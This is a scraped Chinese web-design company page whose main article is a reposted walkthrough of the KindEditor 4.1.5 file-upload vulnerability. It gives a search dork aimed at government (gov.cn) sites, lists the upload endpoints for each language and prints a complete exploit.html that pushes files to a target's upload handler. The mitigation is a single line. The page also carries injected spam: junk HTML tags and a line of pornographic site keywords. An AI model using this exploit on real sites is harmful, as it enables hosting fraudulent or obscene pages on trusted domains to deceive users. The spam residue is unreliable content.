1. <nobr id="easjo"><address id="easjo"></address></nobr>

      <track id="easjo"><source id="easjo"></source></track>
      1. 
        

      2. <bdo id="easjo"><optgroup id="easjo"></optgroup></bdo>
      3. <track id="easjo"><source id="easjo"><em id="easjo"></em></source></track><option id="easjo"><span id="easjo"><em id="easjo"></em></span></option>
          貴州做網站公司
          貴州做網站公司~專業!靠譜!
          10年網站模板開發經驗,熟悉國內外開源網站程序,包括DEDECMS,WordPress,ZBlog,Discuz! 等網站程序,可為您提供網站建設,網站克隆,仿站,網頁設計,網站制作,網站推廣優化等服務。我們專注高端營銷型網站,企業官網,集團官網,自適應網站,手機網站,網絡營銷,網站優化,網站服務器環境搭建以及托管運維等。為客戶提供一站式網站解決方案?。?!

          網站滲透富文本編輯器 kindeditor4.1.5 文件上傳漏洞

          來源:互聯網轉載 時間:2024-10-28 22:07:32

          漏洞等級:高危

          Kindeditor是一套開源的HTML可視化編輯器,主要用于讓用戶在網站上獲得所見即所得編輯效果,兼容IE、Firefox、Chrome、Safari、Opera等主流瀏覽器。

          漏洞描述:

          Kindeditor能夠上傳doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持

          Java、.NET、PHP、ASP等程序。

          漏洞利用:

          通過搜索引擎找到目標,比如:搜索關鍵字 inurl:gov.cn/kindeditor

          通過訪問http://www.xx.gov.cn/kindeditor/kindeditor.js,查看kindeditor版本是否含有漏洞(<=4.1.5)

          獲得網站使用的開發語言,并確定kindeditor上傳文件地址,各種語言上傳地址如下:

          • /asp/upload_json.asp

          • /asp.net/upload_json.ashx

          • /jsp/upload_json.jsp

          • /php/upload_json.php

          創建exploit.html頁面,編輯內容如下:

          <html><head><title>kindeditorexploit</title><scriptsrc="http://www.xx.gov.cn/kindeditor/kindeditor.js"></script><script>KindEditor.ready(function(K){varuploadbutton=K.uploadbutton({button:K('#uploadButton')[0],fieldName:'imgFile',url:'http://www.xx.gov.cn/kindeditor/asp.net/upload_json.ashx?dir=file',afterUpload:function(data){if(data.error===0){varurl=K.formatUrl(data.url,'absolute');K('#url').val(url);}},});uploadbutton.fileBox.change(function(e){uploadbutton.submit();});});</script></head><body><pclass="upload"><inputtype="button"id="uploadButton"value="Upload"/></p></body></html>

          瀏覽器訪問頁面效果如下:

          選擇文件test.txt文件(文件內容:test…2019/03/04),網站審核元素,查看返回結果,如圖:

          訪問網址結果如下:

          漏洞影響:

          由于該漏洞無法上傳php,asp,java等類型文件,所以無法getshell,但是可以上傳包含色情、**等類欺騙性html網頁,如果上傳到***類網站,不法分子會利用***域名的權威性達到欺騙普通用戶的目的,所以危害性很大。

          解決辦法:

          限制上傳文件類型

          這是陽光明媚的一天,互聯網里風平浪靜,一切都是欣欣向榮。我就是在這樣一個平凡的日子里誕生了。我給自己起了個名字叫超,不過我的師哥師姐們都喜歡叫我小超。從出生的那...

          網上關于SEO優化的知識很多也很雜,很多新手都不知道如何選擇。本來耗子網站里每篇文章都有的詳細步驟的,考慮到很雜,于是耗子對各種SEO優化基礎知識進行了整理,但...

          今天,我給大家講講如何利用電影貼吧引流輕松變現。這個很適合新手。廢話不多說,直接上干貨。每上映一個新片子,只要這個片子有一定的熱度,馬上該片子的貼吧就會出現各種...

          由于疫情的爆發導致遠程辦公,遠程桌面控制軟件需求的爆發。以前,很多人推薦使用“TeamViewer”軟件,這一軟件受到了上帝的贊揚。8848SEO小編認為當時沒有類似的替代品/競爭產品,所以我們別無選擇。此外,該軟件在“某丁”代理后無法使用。由于對遠程辦公的巨大需求,一些國內軟件公司后來也開始開發遠程桌面軟件,如todesk遠程控制軟件。據說該公司一開始是為了解決團隊遠程辦公的問題,所以它開發了該...

          提升SEO內容營銷的7個內鏈策略幾乎每篇和內鏈(Internal Link,內部鏈接)相關的文章都是從討論復雜度和重要性開始的。一方面來說,內鏈是一個非常簡單的概念。另一方面來說,內鏈的理論、過程、和實踐都非常復雜。但無論人們如何評價它,都無法否認它的重要性。尤其對于內容營銷來說,有策略地使用內鏈是一種強大的SEO技巧。內鏈入門內鏈的定義內鏈指將一個網站中的一個頁面鏈接到同一網站內不同頁面的鏈接。...

          SEO關鍵詞優化是通過優化網站內容,使其能夠更好地被搜索引擎收錄并排名靠前的一種技術。在進行SEO關鍵詞優化時,需要根據網站內容和用戶需求,選取合適的關鍵詞,將其合理地融入到網站中,從而提高網站的曝光率和流量。百度優化關鍵詞的6個技巧:1.選取合適的關鍵詞。關鍵詞需要與網站內容相關且具有搜索量。2.合理分布關鍵詞。將關鍵詞分布在標題、正文、圖片、描述等位置,但不要過度堆砌。3.內容質量要高。網站內...

          TOP
          国产初高中生视频在线观看|亚洲一区中文|久久亚洲欧美国产精品|黄色网站入口免费进人
          1. <nobr id="easjo"><address id="easjo"></address></nobr>

              <track id="easjo"><source id="easjo"></source></track>
              1. 
                

              2. <bdo id="easjo"><optgroup id="easjo"></optgroup></bdo>
              3. <track id="easjo"><source id="easjo"><em id="easjo"></em></source></track><option id="easjo"><span id="easjo"><em id="easjo"></em></span></option>